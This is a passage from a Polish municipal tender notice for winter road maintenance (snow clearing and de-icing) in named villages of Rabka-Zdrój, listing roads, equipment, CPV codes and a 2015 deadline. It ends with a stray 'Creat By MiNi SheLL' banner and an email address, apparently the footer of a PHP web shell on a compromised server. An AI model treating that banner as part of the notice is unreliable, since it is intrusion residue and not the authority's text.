- droga do Oczyszczalni Ścieków i Sortowni Surowców Wtórnych (podjazd od przejazdu kolejowego do drogi krajowej Nr 28 utrzymanie na czarno);
- Chodnik wraz z poboczem wzdłuż drogi krajowej nr 28 Zator - Jasło;
- do potoku Lubońskiego;
- Ferdułówka, Dział, droga do cmentarza wraz z parkingiem;
- teren wokół Szkoły Podstawowej nr 4;
- do Polczakówki;

Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) prowadzenie dyżurów dyspozytorskich.

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca.
Wykaz wymaganego sprzętu przewidzianego dla Części IV:
1) ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz - min. 1 szt.
2) koparko-ładowarka - min. 1 szt. 

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zimowe utrzymanie na terenie SOŁECTWA PONICE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie i utrzymanie przejezdności dróg gminnych na terenie Sołectwa Ponice:
- Pod Polanę (od pętli autobusowej);
- Do Panka; Do Gładysza;
- parking przy Kościele; droga do cmentarza,
- Sołtysówka (Górna) koło Plebanii;
- Sołtysówka, Twarogówka, Skawskówka;
- Worwowo koło szkoły łącznie z placem i parkingiem; Worwowo do budynku nr 101 C;
- Filasówka, Dulańskówka, Zborkówka, Na Worwówce;
- Krupówka, Czuptówka, Kapłonówka, Mardłówka, Świdrówka;
- Madejówka, Spyrkówka, Ryplówka;
- Sempówka, Bacówka, Gawłówka, Pstrągówka;
- Rola Na potok do nr 218, Katrynówka, Luberdówka, Leśniówka, Gwiżdzówka, Liskówka;
- dojazd do garażu OSP Ponice;
- chodniki na terenie Sołectwa Ponice;
- Teren koło kapliczki na Sołtysówce od strony wjazdu do P. Chudej;
- Szkoła Podstawowa w Ponicach dojazd od drogi powiatowej;

Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) prowadzenie dyżurów dyspozytorskich.

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca.

Wykaz wymaganego sprzętu przewidzianego dla Części V:
1) ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz - min. 1 szt.
2) koparko-ładowarka - min. 1 szt. 

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zimowe utrzymanie przejezdności dróg gminnych na terenie SOŁECTWA RDZAWKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie i utrzymanie przejezdności dróg gminnych na terenie Sołectwa Rdzawka:
- Sołtysia Dolina do zakopianki, boczne Sołtysiej Doliny (do Czupty, do Wróbli, do Filasów), Magierówka;
- parking przy Kościele;
- Stachnikówka, Srokówka, Srokówka boczna do Kubińskiego Józefa, Cieślówka;
- droga do cmentarza wraz z parkingiem;
- chodniki na terenie Sołectwa Rdzawka;
- Zającówka, Dudkówka;
- Rusnakówka; Papieżówka;
- Loskówka, Polakówka, Nogówka;
- Kościelniakówka, Kubanówka, Cieligówka, Starmachówka, Leśniakówka;
- plac przy OSP Rdzawka, Kowalczykówka, Zygadówka, Piłatówka, Lutwinówka, Ziembówka, Piątkówka, Kowalówka;
- do Twaroga, Buloskówka, Szczerbówka, Zarembek, Rolówka;
- droga Rdzawka Polakówka - Obidowa (stacja paliw przy zakopiance);
- Zespół Szkoły Podstawowej i Gimnazjum w Rdzawce - dojazd od drogi powiatowej. 

Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) prowadzenie dyżurów dyspozytorskich. 

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca.


Wykaz wymaganego sprzętu przewidzianego dla Części VI:
1) ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz - min. 1 szt.
2) koparko-ładowarka - min. 1 szt. 

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zimowe utrzymanie przejezdności dróg gminnych oraz chodników na terenie SOŁECTWA CHABÓWKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie i utrzymanie przejezdności dróg gminnych oraz chodników na terenie Sołectwa Chabówka, Role:
- Możdżeniówka, Wydrowa, Głowaczowa;
- Zagrody, Kroczkowa;
- Kaczmarczykowa, Lachówka;
- Jędrochowa, Worwowa, Łęgi;
- Zembalowa, Palarzowa I i Palarzowa II, Buksowa od wiaduktu do tunelu;
- droga do Skawy (do granicy Gminy Rabka-Zdrój);  
- osiedle za ekranami przy Zakopiance - Rola Kaczmarczykowa do p. Krauzowiczów;
- droga do Kościoła wraz z parkingiem;
- wjazd do Przedszkola wraz z parkingiem;
- Łęgi od wiaduktu do p. Pniaczków (za Skansenem);
- osiedle Kilińskiego (za ekranami wzdłuż Zakopianki); 
- wjazd do OSP Chabówka;
- utrzymanie wszystkich przejazdów kolejowych w ciągach dróg gminnych na terenie Sołectwa polegające na odśnieżeniu oraz posypaniu solą (tzw. utrzymanie na czarno) na odcinku po 10,0 m od osi przejazdu w obydwu kierunkach;
- chodniki na terenie Sołectwa Chabówka;
- chodnik wzdłuż budynku nr 256 koło Przedszkola (za barierkami), chodnik wzdłuż Szkoły Podstawowej - odśnieżanie ręczne!

Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) prowadzenie dyżurów dyspozytorskich. 

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca.

Wykaz wymaganego sprzętu przewidzianego dla Części VII:
1) ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz - min. 1 szt.
2) koparko-ładowarka - min. 1 szt. 

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zimowe utrzymanie przejezdności dróg gminnych na terenie Miasta i Gminy Rabka-Zdrój - ul. Bystra, ul. Gilówka, Kapicówka, Garncarska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odśnieżanie i utrzymanie przejezdności następujących dróg gminnych na terenie miasta i gminy Rabka-Zdrój:

- ul. Bystra;
- osiedle przy ul. Bystra dojazd od ul. Kilińskiego;
- ul. Gilówka wraz z wszystkimi ulicami bocznymi; 
- Kapicówka;
- ul. Garncarska wraz z bocznymi;
- chodnik przy ul. Kilińskiego (DK 47) Zabornia - wiadukt Chabówka.

Zakres prac obejmuje w szczególności: 
1) przygotowanie materiałów i sprzętu, 
2) odśnieżanie, 
3) zwalczanie śliskości tj. zapobieganie powstawaniu i likwidowanie śliskości zimowej przez stosowanie materiałów uszorstniających, i chemicznych,
4) prowadzenie dyżurów dyspozytorskich, 

Upoważnioną osobą do potwierdzenia wykonanych prac jest Koordynator ZUD lub jego zastępca.

Wykaz wymaganego sprzętu przewidzianego dla Części VIII:
1) ciągnik (lub pojazd przeznaczony do odśnieżania) z pługiem oraz rozsypywacz - min. 1 szt.
2) koparko - ładowarka - min. 1 szt. 

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com